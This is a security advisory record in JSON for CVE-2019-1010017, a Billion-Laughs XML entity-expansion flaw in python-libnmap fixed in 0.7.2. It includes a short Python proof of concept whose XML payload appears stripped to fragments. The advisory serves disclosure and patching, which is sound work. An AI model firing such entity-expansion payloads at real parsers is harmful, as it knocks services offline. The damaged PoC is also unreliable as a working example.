{ "schema_version": "1.4.0", "id": "GHSA-9ccv-p7fg-m73x", "modified": "2024-10-15T16:43:37Z", "published": "2019-07-18T15:38:41Z", "aliases": [ "CVE-2019-1010017" ], "summary": "XML Injection in python-libnmap", "details": "### Description\n\npython-libnmap is affected by a Billion-Laughs -style XML injection vulnerability.\n\n### PoC\n\n```python\nty = NmapParser()\n\npayload = \"\"\"\n\n \n \n \n \n]>\n&lol3;\n\"\"\"\n\nty.parse(payload)\n```", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "affected": [ { "package": { "ecosystem": "PyPI", "name": "python-libnmap" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.7.2" } ] } ] } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010017" }, { "type": "WEB", "url": "https://github.com/savon-noir/python-libnmap/issues/87" }, { "type": "WEB", "url": "https://github.com/savon-noir/python-libnmap/commit/71b707758851e4b622f87d9a73266e06f60aeab4" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/python-libnmap/PYSEC-2019-218.yaml" }, { "type": "PACKAGE", "url": "https://github.com/savon-noir/python-libnmap" } ], "database_specific": { "cwe_ids": [ "CWE-91" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2019-07-18T15:38:22Z", "nvd_published_at": "2019-07-15T03:15:00Z" } }